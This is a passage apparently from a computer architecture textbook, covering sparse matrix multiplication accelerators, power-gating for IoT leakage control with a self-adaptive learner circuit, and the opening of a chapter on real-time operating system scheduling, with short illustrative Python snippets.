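def skip(stream, pos, target):
    """Galloping SkipTo: double the step until reaching >= target."""
    step = 1
    while pos + step < len(stream) and stream[pos + step] < target:
        pos += step
        step *= 2
    return pos + 1 if stream[pos] < target else pos

print(intersect([0, 3, 9, 12], [3, 4, 5, 9, 12], skip))  # [3, 9, 12]
```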
Recently, two-dimensional systolic arrays have been widely used for processing GEMM
operations (Jouppi et al. 2017). However, the systolic array is not well suited to
dealing with sparse and irregular matrices. To flexibly compute SpGEMM operations
between two matrices with arbitrary shapes, SIGMA (Qin et al. 2020) presents a 2D
processing array with a flexible distribution network and a programmable reduction
network (Fig. 12). To design a flexible distribution network, SIGMA adopts a Benes
network (Arora et al. 1990). The Benes network is a non-blocking multistage
network allowing any source to connect with any destination without any contention
(Fig. 12a). First, the consecutive nonzero data from matrix A, a0 , a1 , a3 , a4 , are
loaded to the multiplicand buffer. Note that a2 is not loaded as SIGMA identifies
rows with all zeroes in matrix B, i.e., the fourth row in the example. Then, the
corresponding nonzero values from matrix B are loaded to the multiplier buffer by
programming the Benes network. For b0 , the path is programmed to be “V-V-D-V.”
For b1 , it is programmed to be “V-V-V-V.” As the outputs from multipliers may have
different destination indices, a forwarding adder network is used to reduce partial
sums flexibly. The example in Fig. 12b shows how two different output values, y0
and y1 , can be computed via the forwarding adder network.
The outer product approach maximizes input data reuse by performing all necessary
multiplications once two vectors are loaded. The issue with the outer product
approach lies in the merge phase, which requires all intermediate partial products
to be reduced to a single output matrix.
In OuterSPACE (Pal et al. 2018), a set of linked lists is used to store intermediate
partial products. An example of the linked lists during the process of outer product-
based matrix multiplication between matrices A and B is provided in Fig. 13a. The
example assumes four processing elements in each processing tile (Fig. 14). Each
PE multiplies one nonzero element from a column of A with all the nonzeroes in
the matched row of B. The partial products are stored in a linked list pointed by a
row pointer (Fig. 13b). The merge phase scans the linked lists pointed by the row
pointers and adds them together when the column index matches. To do so, the
Fig. 13 (a) An example of outer product matrix multiplication and (b) the linked list representa-
tion of partial products used in OuterSPACE (Pal et al. 2018). In this example, four PEs are assumed
where each PE multiplies one nonzero element from a column of A with all the nonzeroes in the
matched row of B (compressed row mode)
Fig. 14 The architecture of a processing tile in OuterSPACE accelerator (Pal et al. 2018). The
processing tile consists of 16 processing elements with dedicated scratch pad memories
To do so, the head of each row's list is fetched and sorted by column index. Then
the smallest-indexed element from the list is stored to its memory location. This
merge strategy in OuterSPACE focuses on minimizing memory traffic. The crossbar
attached to the scratch pad memories is utilized to move data that need to be summed
together. It also acts as a flexible router node to communicate with higher-level
caches.
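The merge phase just described behaves like a k-way merge of column-sorted lists; the Python sketch below models it for one output row (data layout and names are illustrative, not OuterSPACE's implementation):

```python
import heapq

def merge_row(lists):
    """Merge per-PE partial-product lists of one output row: each list holds
    (col, value) pairs sorted by column; matching columns are accumulated."""
    merged = {}
    heap = [(lst[0][0], i, 0) for i, lst in enumerate(lists) if lst]
    heapq.heapify(heap)                  # heads of each list, sorted by column
    while heap:
        col, i, k = heapq.heappop(heap)  # smallest-indexed element first
        merged[col] = merged.get(col, 0.0) + lists[i][k][1]
        if k + 1 < len(lists[i]):
            heapq.heappush(heap, (lists[i][k + 1][0], i, k + 1))
    return sorted(merged.items())

# Two PEs contributed to the same row; column 2 appears in both lists.
print(merge_row([[(0, 1.0), (2, 2.0), (3, 3.0)], [(2, 4.0)]]))
# -> [(0, 1.0), (2, 6.0), (3, 3.0)]
```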
Yet, the outer product approach described in Fig. 13a shows poor output reuse, as K
partial-product maps need to be merged for A ∈ R^{N×K} and B ∈ R^{K×N}. To reduce
the number of merge operations, SpArch (Zhang et al. 2020) presents matrix
condensing along with a Huffman tree scheduler. First, matrix condensing is used to
reduce the number of partial-product maps (Fig. 15a). As nonzeroes are shifted to
the leftmost column, elements with the same column index are color-coded for
visualization purposes. One drawback of matrix condensing is that the data reuse
factor for matrix B may decrease, as multiple rows may be needed. To mitigate the
fetching overhead, a row prefetcher is utilized that loads the required rows of
matrix B while the data from matrix A is streamed in. Even with matrix condensing,
a large number of partial-product maps can be produced. The optimized merge order
significantly reduces the data to be loaded from DRAM, and this order is determined
by the Huffman tree scheduler in SpArch (Fig. 15b). With all these design techniques
together, SpArch reduces DRAM access by 2.8× over OuterSPACE.
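The scheduling idea can be sketched in Python as a k-ary Huffman-style merge: always merging the smallest remaining partial-product maps first minimizes the total data written to and re-read from memory (a simplified model; an optimal k-ary Huffman tree would additionally pad with empty maps so the final merge is full):

```python
import heapq

def huffman_merge_order(sizes, ways=4):
    """Greedily merge the 'ways' smallest partial-product maps first and
    return the total data volume moved across all merge steps."""
    heap = list(sizes)
    heapq.heapify(heap)
    traffic = 0
    while len(heap) > 1:
        group = [heapq.heappop(heap) for _ in range(min(ways, len(heap)))]
        merged = sum(group)        # a merge reads each map once, writes the result
        traffic += merged
        heapq.heappush(heap, merged)
    return traffic

# Illustrative map sizes: many small maps and a few large ones.
print(huffman_merge_order([41, 15, 15, 13, 13, 12, 9, 7, 6, 3, 2, 2, 2, 2, 2]))
```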
Fig. 15 The hardware accelerator for SpGEMM, named SpArch (Zhang et al. 2020), using matrix
condensing, row prefetcher, and the Huffman tree scheduler. (a) Condensed outer product operation
on the same example from Fig. 13a. (b) An example of a four-way Huffman tree scheduler that
minimizes the memory traffic
Architectures for Power-Gating-Based Active Leakage Control
In most applications, IoT devices are seldom active. Consider smart home IoT
devices such as Google Home (Google Home) or Amazon Blink (Amazon Blink). Depending
on user activity and environmental conditions, these devices are rarely fully
active. In such IoT devices, the overall system will comprise a smaller
always-on component which continuously listens to user input or environmental
activity. However, the majority of the system components need not be constantly
active. Nonetheless, if an idle system component is connected to the power grid,
even though it doesn’t consume any active (i.e., dynamic) power, it will still
consume leakage power. Leakage power is dissipated due to various leakage
mechanisms in transistors, such as subthreshold leakage, gate tunneling, and body
junction leakage. Due to these leakage currents, transistors continue to dissipate
static power even after they have been turned off. In advanced CMOS technologies
especially, leakage power dissipation can become quite significant due to worsening
short-channel effects in transistors.
Overview of Power-Gating
The leakage power of a system has become a critical concern. To mitigate leakage
power, gate control over the channel can be improved using silicon-on-insulator,
FinFET, and nanowire transistor structures. Alternative switching mechanisms, such
as tunnel FETs (Trivedi and Mukhopadhyay 2014; Trivedi et al. 2014a, 2015) and
magnetic devices (Nasrin et al. 2019), have been explored to operate transistors at
a lower supply voltage (VDD), thereby also resulting in a lower leakage current. However,
in addition to the above technology-level solutions, leakage power can also be
minimized by architecture-level techniques and mainly by disconnecting or power-
gating idle system components from the global power grid (Jiang et al. 2005).
Figure 16a shows a p-type power-gating scheme where a top PMOS transistor
can disconnect the idle system components from the main power grid to minimize
leakage power dissipation. Similarly, an n-type power-gating in Fig. 16b will
disconnect idle system components from the ground grid, essentially achieving the
same leakage power-saving benefit. Various micro-architectural control signals such
as block access signal for caches, clock gating signals for cores, or input/output data
phases of LUTs for FPGA can be used to detect if a system component is idle and
then apply power-gating to the unit (Hu et al. 2004).
Power-gating can also be performed at various scales. In a coarse-grained power-
gating configuration, the power-gating transistor can be shared for all or many
system components and can be controlled by a single power-gating signal. On
the other hand, in a fine-grained power-gating configuration, the entire system can
be partitioned into many power-gating domains, each controlled independently by
respective power-gating signals. Compared to coarse-grained power-gating, fine-
grained power-gating is more attractive for IoT devices to save leakage energy
Fig. 16 Power-gating in (a) n-type and (b) p-type modes to minimize leakage power in a digital
system by disconnecting idle components from power/ground grid
even during brief idle periods. By finely detecting the activity of respective system
components, fine-grained power-gating schemes can find more opportunities to save
leakage power than a coarse-grained scheme that waits for the entire system to be
inactive before invoking power-gating.
Although power-gating is a simple and effective method to save leakage power, the
method comes with a unique set of challenges and trade-offs. Consider power-gating
of an inverter chain in Fig. 17a. As the circuit transitions between normal and
power-gated modes, the various additional capacitances shown to the figure's right
switch, resulting in power-gating energy overheads. For example, the capacitance at virtual-
VDD contributes to power-gating overhead. Note that a capacitance at virtual-VDD
arises only due to power-gating implementation. In a typical implementation, the
virtual-VDD node will not be present. Furthermore, since many transistors are
connected to the virtual-VDD, wire interconnect capacitance, Cwire , and transistor
parasitic capacitance, CS , at virtual-VDD are significant and therefore can lead to
considerable power-gating overhead. Meanwhile, if power-gating overheads exceed
leakage saving, the scheme becomes inefficient.
Figure 17b shows the typical transients of virtual-VDD and leakage current
as power-gating is invoked. Virtual-VDD is the local supply node of the power-
gated domain which is separated from the global supply grid due to power-gating
transistor. In the figure, as soon as the power-gating transistor is turned off, virtual-
VDD begins to drop. The leakage current of the logic block at virtual-VDD
discharges the node, while the turned-off power-gating transistor does not replenish
it at the same rate. Eventually, virtual-VDD settles to a lower voltage VPG, where
the leakage currents of the power-gating transistor and the underlying logic unit
are balanced.
Also note that as soon as power-gating is invoked, leakage current from the system
drops but then slowly rises to settle to a new level, Ileak,PG . The power-gating
transistor governs the leakage current of a power-gated system. In the beginning,
the power-gating transistor is turned off and has a minimal source-to-drain voltage.
Therefore, the current through the power-gated unit is relatively small. However,
as virtual-VDD settles to VPG , a sufficient source-to-drain voltage develops across
the power-gating transistor, resulting in the equilibrium leakage current, Ileak,PG ,
through the system.
Voltage variations at the virtual-VDD also induce power overhead at many other
circuit nodes. For example, consider the intermediate nodes in the circuit below
holding a logic one. As virtual-VDD drops to VPG, these nodes are also discharged.
When the circuit becomes active again, all these nodes must be recharged to the
supply voltage, VDD. Therefore, these logic capacitances, CFU,1, also contribute
to dynamic energy overheads due to power-gating.
A critical design requirement for the power-gating transistor is also that it should
present a minimal resistance when the underlying logic unit is active. If the power-
gating transistor’s resistance is high, it will reduce the voltage swing (i.e., effective
supply voltage) across the logic unit, resulting in a lower performance. Therefore,
it is standard practice to dedicate sufficient area to the power-gating transistors
to minimize their on-resistance. Typically, power-gating a system leads to ∼5–10%
area overhead. Meanwhile, since the power-gating transistors are large, toggling
their gate potential itself becomes energy expensive. Moreover, to switch the
power-gating transistors with high performance, a dedicated inverter buffer chain
is necessary. Both the high gate capacitance of the power-gating transistor and its
driver circuits lead to power-gating overheads, captured by the Cgate,PG and Cinv,PG
capacitances in Fig. 17a.
Under a suboptimal design, power-gating can deteriorate the voltage swing at the
connected logic unit and induce significant noise on the power grid (Kim et al. 2003).
Figure 18 shows this pictorially: as Logic-1 wakes up, the sudden demand for
charging virtual-VDD and intermediate circuit nodes induces a current rush, leading
to a supply voltage droop at the unit. Without a robust power management circuit,
the voltage droop can also create supply noise spreading throughout the power grid.
Fig. 18 Wake-up-induced supply noise: Logic-1 and Logic-2 share the power grid, with
decoupling capacitances placed to limit noise propagation
To mitigate such power supply noise, various techniques have been proposed. For
example, Agarwal et al. (2006) use multiple sleep modes to navigate the trade-off
between leakage saving and wake-up delay. Kahng et al. (2013) and Akl et al. (2009)
use a staggered turn-on of power-gating transistors. In this scheme, a power-gating
transistor is implemented as an array of parallel instances. When the logic unit
activates, the instances are turned on sequentially in a staggered fashion, rather
than all at once, to reduce the current rush. However, due to the staggered turn-on,
the power-gated logic unit requires more time to turn on, resulting in performance
degradation. In another set of techniques, a decoupling capacitor is added to the
VDD or virtual-VDD node to minimize the proliferation of supply noise through the
grid (Charania et al. 2012). Decoupling capacitances act as a low-pass filter on the
supply grid, filtering out high-frequency noise. However, this solution also incurs
several limitations. First, the placement
of sufficient decoupling capacitance incurs a large area. Second, if the decoupling
capacitance is placed at the global supply grid, the capacitors are exposed to voltage
drop and therefore introduce their own leakage. Alternatively, if the decoupling
capacitance is placed at the virtual-VDD, it slows down the power-gating domain’s
transition between active and inactive modes. Decoupling capacitance at the virtual-
VDD also contributes to power-gating overheads.
The leakage energy saved by power-gating depends strongly on process, voltage, and
temperature (PVT) conditions and on the activity pattern of the logic unit. For
example, at high temperatures or low threshold voltages, the leakage current through
transistors is high; therefore, potentially higher leakage power savings can be
achieved under these conditions. Similarly, if transistors have low threshold
voltages due to process variability, they will dissipate more leakage, and
power-gating can become more effective. When the overheads of power-gating exceed
the leakage energy saving, power-gating becomes inefficient. A power-gating scheme
that doesn't intrinsically account for such trade-offs between leakage power saving
and transition energy overhead is bound to be suboptimal under varying PVT and
system activity conditions. Moreover, if the power-gating architecture is
excessively complex, it will incur its own significant energy overheads, reducing
the benefit of power-gating.
Overall, even though power-gating is an elegant and straightforward approach
to minimize leakage power wastage in IoT devices, the technique requires several
deeper considerations, as illustrated above. In the following, a unique learning-
based approach is discussed to dynamically characterize trade-offs between energy-
saving and power-gating overhead so that a self-adaptive architecture only invokes
power-gating when it is efficient to do so.
Power-Gating Efficiency Learner
Fig. 19 (a) The power-gating efficiency learner circuit. (b) Evolution of the node
voltage V(ST) relative to VREF under the IDL signal over an observation period Tobs
The power-gating efficiency learner monitors the idle signal of the power-gated
domain, i.e., IDL. When the IDL signal transitions from
zero to one (0→1), it indicates a power-gating opportunity for the system. Mode
transitions in a power-gated domain incur an energy overhead (E_ov,tran); meanwhile,
the leakage savings depend on PVT conditions as well as the duration/activity of the
IDL signal. The power-gating efficiency learner mimics this behavior using a
two-transistor replica of the power-gated domain. With a 0→1 transition in the IDL
signal, transistor TXN in the learner circuit is activated through the edge detector
and reduces the voltage (VST) of the node ST. On the other hand, when IDL = 1, the
subthreshold-biased transistor TXP increases VST. Therefore, TXN and TXP contend to
regulate the potential of the node ST. The transition energy of the power-gated
domain, i.e., E_ov/tran, is reflected by the drop in VST induced by TXN, whereas the
leakage energy-saving, ∫P_leak dt, is reflected by the increase in VST induced by TXP.
TXN and TXP can be designed to ensure that VST follows Eov/tran and Pleak in
the power-gated domain. This can be achieved by designing them based on the
following equations:
$$ I(TX_P) \propto P_{leak} \qquad (3a) $$
$$ T_{PW} \times I(TX_N) \propto E_{ov/tran} \qquad (3b) $$
Here, I(TXP ) is the current through TXP . TPW is the pulse width generated by
the edge detector. I(TXN ) is the on-current of TXN . INPG and IPG are the leakage
currents of the power-gated domain in the non-power-gated and power-gated modes,
respectively. To minimize the area of the learner circuit, TXN can be of the minimum
size, and TXP can be determined by Eq. 3c. By following the above equations, the
learner circuit also intrinsically tracks the PVT variations of the power domain
when arbitrating power-gating efficiency. Due to its small area, the learner circuit can be
embedded within the power domain to sense local PVT conditions. If the power-
gated domain temperature rises, the current through subthreshold biased TXP also
increases, resulting in a faster charging rate of the node ST. Therefore, under the
same activity pattern of TXN , node ST’s potential rises faster at higher temperatures.
Similarly, if the power-gated domain is exposed to a low-threshold-voltage process
corner, TXP in the embedded learner circuit will also have a lower threshold
voltage. Thus, with varying process conditions, the charging rate from TXP tracks
the process corner.
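A behavioral model of the learner helps see how the TXN/TXP contention encodes the trade-off; all component values in this Python sketch are illustrative, chosen only so the two example IDL patterns land on opposite sides of the decision.

```python
# Behavioral sketch of the learner; component values are illustrative only.
V_REF, C_ST = 0.6, 1e-12                  # reference voltage (V), storage cap (F)
I_TXP, I_TXN, T_PW = 2e-9, 80e-9, 1e-6    # charge/discharge currents (A), pulse (s)

def learn(idl_trace, dt=1e-6):
    """idl_trace: sampled IDL signal (0/1). Returns CTRL for this cycle."""
    v, prev = V_REF, 0
    for idl in idl_trace:
        if idl and not prev:
            v -= I_TXN * T_PW / C_ST      # Eq. (3b): overhead proxy per 0->1 edge
        if idl:
            v += I_TXP * dt / C_ST        # Eq. (3a): leakage-saving proxy while idle
        prev = idl
    return 1 if v >= V_REF else 0         # CTRL=1: savings dominate, allow gating

long_idle = [0] * 5 + [1] * 95            # few transitions, long idle period
choppy = [0, 1] * 50                      # frequent transitions, short idle periods
print(learn(long_idle), learn(choppy))    # -> 1 0
```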
Self-Adaptive Power-Gating Architecture
Fig. 20 Self-adaptive power-gating: the learner alternates between learn and adapt
cycles, and its CTRL output selects, through a multiplexer, whether the idle signal
is allowed to generate the power-gating signal
Figure 20 shows how the learner circuit arbitrates whether the potential leakage
savings of power-gating outweigh its overheads. In the figure, the periodic signal RD determines
cycle (CN ) of the learner. In this period, by comparing potential leakage savings
to power-gating overheads, the learner deduces if it is beneficial to perform power-
gating. At the beginning of CN , the node ST is charged to the reference voltage
(VREF ) through the transmission gate in the learner circuit and using the control
signal RCH. At the end of CN , the final ST voltage VST is compared to VREF using a
clocked comparator-controlled by the read signal RD. Based on such a comparison,
the learner generates the output signal CTRL. If CTRL = 0, i.e., VREF > VST ,
it indicates that the overheads are dominant since TXN is able to discharge CST
faster than TXP can charge it. Essentially, overheads in the power-gated domain are
dominant over the energy-savings under power-gating. In this case, the multiplexer
in Fig. 20 does not perform power-gating even if the unit is idle. On the other hand,
if CTRL = 1, it indicates that leakage savings are dominant over the overheads.
Therefore, power-gating is performed as usual depending on the idle signal. Since
learner circuit’s output intrinsically depends on PVT conditions as well as activity
patterns, power-gating is adaptive to such variations in the power-gated domain.
Test Chip and Measurement Results
Fig. 21 (a) Test chip to characterize power-gating efficiency learner. (b) Self-adaptation under
varying idle signal patterns
Fig. 22 (a) Leakage + overhead power at various power-gating scenarios (NPG no power-gating,
PG power-gating, SAPG self-adaptive power-gating). (b) Measured generation of idle signal-based
power-gating signal at varying idle signal activity and temperature
A test chip, shown in Fig. 21a, implements inverter chains with embedded heaters in
both a regular-threshold-voltage (RVT) and a low-threshold-voltage (LVT)
power-gating domain. The RVT and LVT power-gating domains essentially emulate
extreme within-chip process variations. A heater, designed with diffusion resistors,
is embedded in the design to emulate dynamic temperature variations. Heater power
is varied to control the on-chip temperature, essentially emulating the effect of hot
spots and local temperature variations.
A key metric for the energy benefit of power-gating is the break-even time. After
the onset of power-gating, at the break-even point, the leakage energy saving equals
the power-gating overhead. If the continuous idle period is longer than the
break-even time, power-gating is rewarding. The learner circuit's accuracy is
characterized by comparing the actual break-even point of a power-gated domain
against the one predicted by the learner. The actual break-even point is measured by
directly power-gating the domain with periodic idle patterns (IDL) of fixed on-time
and varying off-time (TOFF). At a lower TOFF, the average total (leakage + overhead)
energy of the domain increases. The corresponding results (label: PG) are shown in
Fig. 22a. The non-power-gated (label: NPG) case is the leakage power in the absence
of power-gating.
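For completeness, the break-even time admits a standard closed form (symbols follow the text above; P_leak,NPG and P_leak,PG denote the leakage power in the non-power-gated and power-gated modes):

$$ T_{BE} \;=\; \frac{E_{ov/tran}}{P_{leak,NPG} - P_{leak,PG}} $$

so power-gating pays off whenever the continuous idle period exceeds T_BE.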
(a) (b)
Fig. 23 (a) The effect of learning cycle on self-adaptive power-gating scheme. (b) Overall system
energy minimizes at an optimal learning period
4 Real-Time Scheduling for Computing Architectures
Arvind Easwaran, Michael Yuhas, Saravanan Ramanathan,
and Ankita Samaddar
Contents
Real-Time Operating System (RTOS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Introduction to Key OS Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Introduction to Real-Time Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Real-Time CPU Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Scheduling on Single-Core CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Scheduling on Multi-core CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Real-Time Scheduling for CPU-GPU Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
GPU Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Scheduling Tasks on a Single GPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
Multi-GPU and CPU-GPU Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
Application Domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Tools and Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Alternative Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Real-Time Edge Computing Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Introduction to Edge Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
The Edge Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
Real-Time Edge Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151
Resource Allocation in Real-Time Edge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
Introduction to Real-Time Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Real-Time Wired Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Real-Time Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Real-Time Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
Routing and Scheduling in Real-Time Wireless Sensor Networks . . . . . . . . . . . . . . . . . . . . 163
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Real-Time Operating System (RTOS)
Introduction to Key OS Features
An operating system (OS) is a software component, commonly also called the kernel due to its central role in modern computing systems. It serves two important functions:
(1) As a hardware abstractor, it facilitates and simplifies the interactions between
end-users (i.e. humans, other connected computing systems, etc.) and the hardware.
(2) As a resource manager, it is responsible for efficiently distributing the hardware
resources among the various software applications in the computing system so as
to achieve global system-wide objectives related to efficiency and performance.
These objectives could include throughput, energy consumption, responsiveness and
resource utilization, among others.
Computing systems have evolved significantly since their inception in the late
1800s. In the early phase, these systems were custom-built and highly optimized
to perform specific tasks (e.g. scientific computations, financial transactions, etc.).
Such batch systems essentially executed a specific software function repeatedly on
different data in a sequential manner. Their main memory (i.e. transient memory)
layout was rather simple: a region dedicated to the customized OS and the remainder for storing data and executing the specialized function. However, their overall
performance was rather limited, not only because of the lack of generalization, but
also because tasks often need to use different hardware resources at different times in their execution. For example, while a task is performing input/output (I/O) operations, the central processing unit (CPU) or processor is idling unless
the OS is able to run some other tasks on the CPU. To overcome this inefficiency,
the concept of multiprogramming was introduced in computing systems. In a multi-
programmed system, several tasks are waiting in main memory for access to various
hardware resources, and the OS efficiently switches between these tasks allocating
them resources depending on their needs. Although the OS functions are inherently
more complex in such systems when compared to batch systems, this flexibility and
dynamism leads to efficient utilization of the hardware resources.
One of the important functions of the OS is to schedule the ready tasks on the
CPU. In other words, this function aims to determine which among the tasks that are
in the main memory and ready to execute should be selected next for execution on
the CPU. The selection strategy is of course influenced by the functional objective
which could either be task-specific such as minimization of average completion time
or system-wide such as throughput maximization. There are several CPU scheduling
strategies including first-come-first-served (FCFS) in which tasks are prioritized
based on their arrival time in the system, shortest job first (SJF) in which tasks
are prioritized based on their CPU execution time and quantum-based round robin
(RR) in which tasks are executed in a round robin fashion with a fixed quantum of
allocated execution time. Among these scheduling strategies, RR and its variants are
popular in the OS industry, mainly due to their ability to increase the responsiveness
of the system; a task is guaranteed to get access to the CPU after waiting for a finite
duration of time.
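As a concrete illustration of quantum-based scheduling, the following Python sketch simulates RR with a fixed quantum and reports task completion times. The task names and execution times are hypothetical.

```python
from collections import deque

def round_robin(tasks, quantum):
    """Simulate RR scheduling; tasks maps task name -> remaining CPU time."""
    ready = deque(tasks.items())
    clock, completion = 0, {}
    while ready:
        name, remaining = ready.popleft()
        run = min(quantum, remaining)   # each task gets at most one quantum
        clock += run
        if remaining - run > 0:
            ready.append((name, remaining - run))  # re-queue unfinished task
        else:
            completion[name] = clock
    return completion

print(round_robin({"t1": 5, "t2": 3, "t3": 8}, quantum=2))
# {'t2': 9, 't1': 12, 't3': 16}: every task gets the CPU within a bounded wait
```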
In a multi-programmed system, when the OS switches a task out of the CPU
before it completes, it may be in the middle of executing a critical transaction
comprising several instructions. For example, this transaction could be modifying
a variable that is shared among several tasks or simply accessing some data that
requires exclusive access. This context switch by the OS may lead to an erroneous
scenario if the task that is switched into the CPU also accesses the same shared
variable or data. The final outcome of executing these instructions from the two tasks
may then depend on the specific location of the context switch, and this problem is
called a race condition; the two tasks are racing against each other to modify the
shared variable or data. Synchronization is an OS function that coordinates the execution of several tasks to ensure that such race conditions do not occur. Of course,
this requires the task developer to annotate and identify instructions that have the
potential to cause race conditions. Synchronization can be achieved either through
specialized hardware instructions (e.g. TestAndSet instruction that allows tasks to
atomically test and set the value of a lock variable) or through OS functions such as
semaphores. A semaphore is a special integer variable that can only be modified by
the OS, and it can be used to lock a set of task instructions so that race conditions
can be prevented.
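The following Python sketch illustrates the idea behind a TestAndSet-based lock. Python exposes no hardware test-and-set instruction, so its atomicity is emulated here with threading.Lock; the class and variable names are illustrative only.

```python
import threading

class TestAndSetLock:
    """Spinlock sketch built on an (emulated) atomic test-and-set primitive."""
    def __init__(self):
        self._flag = False
        self._guard = threading.Lock()  # stands in for hardware atomicity

    def _test_and_set(self):
        # Atomically return the old value of the flag and set it to True.
        with self._guard:
            old, self._flag = self._flag, True
            return old

    def acquire(self):
        while self._test_and_set():  # spin until the old value was False
            pass

    def release(self):
        self._flag = False

counter, lock = 0, TestAndSetLock()

def worker():
    global counter
    for _ in range(100_000):
        lock.acquire()       # critical section: prevents the race condition
        counter += 1
        lock.release()

threads = [threading.Thread(target=worker) for _ in range(4)]
for t in threads: t.start()
for t in threads: t.join()
print(counter)  # 400000: no increments are lost
```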
Main memory management is an important function of the OS in a multi-
programmed system, because of the need to efficiently distribute this resource
among the various tasks that are ready to execute. Paging is a popular dynamic
partitioning scheme in which the entire memory region is pre-partitioned into fixed-
size pages, and the OS allocates pages to tasks on demand. Thus, the number of
pages allocated to a task can vary over time, enabling a very dynamic allocation
scheme that adapts to task demand at runtime. Paging also enables the concept of
virtual memory since all the pages of a task need not be allocated in main memory at
all times. Pages are brought into main memory from secondary storage on demand,
which means that the memory address space accessible to a task can be much larger
than the available main memory.
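A minimal sketch of paged address translation is shown below; the 4 KB page size and the page-table contents are illustrative assumptions.

```python
PAGE_SIZE = 4096  # bytes; a common fixed page size (assumption for illustration)

def translate(virtual_addr, page_table):
    """Map a virtual address to a physical one via a per-task page table."""
    page_number, offset = divmod(virtual_addr, PAGE_SIZE)
    frame = page_table.get(page_number)
    if frame is None:
        # Page not resident: it must be fetched from secondary storage on demand.
        raise LookupError("page fault")
    return frame * PAGE_SIZE + offset

# Task's page table: virtual page -> physical frame (allocated on demand).
page_table = {0: 7, 1: 3}
print(hex(translate(0x1A2C, page_table)))  # page 1, offset 0xA2C -> 0x3A2C
```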
It is impossible to provide an in-depth coverage of the various OS functions
and their interactions with hardware as well as application software in such a brief
introductory note. Interested readers should refer to well-known OS textbooks (Silberschatz et al. 2018; Tanenbaum and Bos 2022).
Cyber-physical systems (CPS) are computing systems in which the cyber world of
computation and communication is closely linked with the physical world of sensors
and actuators. Such systems provide monitoring, coordination and control services
for the physical counterparts and find application across a variety of domains such as
avionics, automotive, medical devices, robotics, smart manufacturing, smart grids,
etc. Within CPS, there exists a class of systems in which the timeliness of decisions is as important as their correctness. These are typically closed-loop control systems deployed in safety-critical settings with stringent requirements. Examples of such systems include airbag control in automobiles, flight control in avionics and robotic control systems, among several others. This class of systems is broadly referred to as real-time systems, in which the timeliness requirements are usually specified using hard deadlines for the real-time tasks.
As a representative example, consider the collision avoidance system in a modern automobile. There are one or more sensors, such as a camera or a radar, which are
observing the environment while the vehicle is in motion. The control system has to
process these sensor inputs, determine the potential for a collision with an obstacle
in the path and take appropriate preventive actions such as application of emergency
brakes and/or steering the vehicle towards safety. The amount of time available to
the system to perform these steps is strictly limited by the speed at which the vehicle
is travelling and the stopping capabilities of the braking system. In other words, the
control task responsible for collision avoidance must produce an output within a pre-
determined amount of time from the instance at which sensor data is available. This
duration of time is the hard deadline imposed on the task due to system requirements
and constraints.
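As a hypothetical back-of-the-envelope illustration, such a deadline can be derived from simple vehicle dynamics. The speed, distance and deceleration values below are assumed purely for illustration.

```python
def time_budget(speed_mps, obstacle_distance_m, max_decel_mps2):
    """Latest time by which braking must begin, measured from sensing."""
    stopping_distance = speed_mps ** 2 / (2 * max_decel_mps2)
    slack = obstacle_distance_m - stopping_distance  # distance to spare
    return slack / speed_mps  # time before that slack is consumed

# Assumed values: 20 m/s (72 km/h), obstacle 60 m ahead, 8 m/s^2 braking.
print(round(time_budget(20.0, 60.0, 8.0), 2))  # 1.75 s hard deadline
```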
To enable the deployment of real-time systems, the OS used must be capable of
meeting the strict timing requirements. Essentially, the OS must allocate hardware
resources to the real-time tasks in such a way that it ensures the satisfaction of
hard deadlines under all considered circumstances. That is, predictability of meeting
the timing requirements even in worst-case scenarios is the primary objective of
the OS in such systems. This is in contrast to general-purpose OS discussed in
section “Introduction to Key OS Features”, in which the objectives are typically
average-case performance metrics such as throughput maximization or completion
time minimization. It is important to note that minimizing the average completion
time of tasks does not necessarily imply that the hard deadlines of tasks will be
met. In order to meet such stringent timing requirements, the OS essentially has to
prioritize access of the hardware resources among the tasks based on their deadlines.
Furthermore, in such systems, it is also important to ensure that the time taken by
various OS functions is bounded and predictable under all considered circumstances
(e.g. time taken for OS functions, time to switch the CPU from one task to another,
etc.). Given these specific requirements, an OS deployed in the context of a real-time
system is called a real-time operating system (RTOS).
To meet the hard deadlines of real-time tasks, an RTOS must be aware of certain
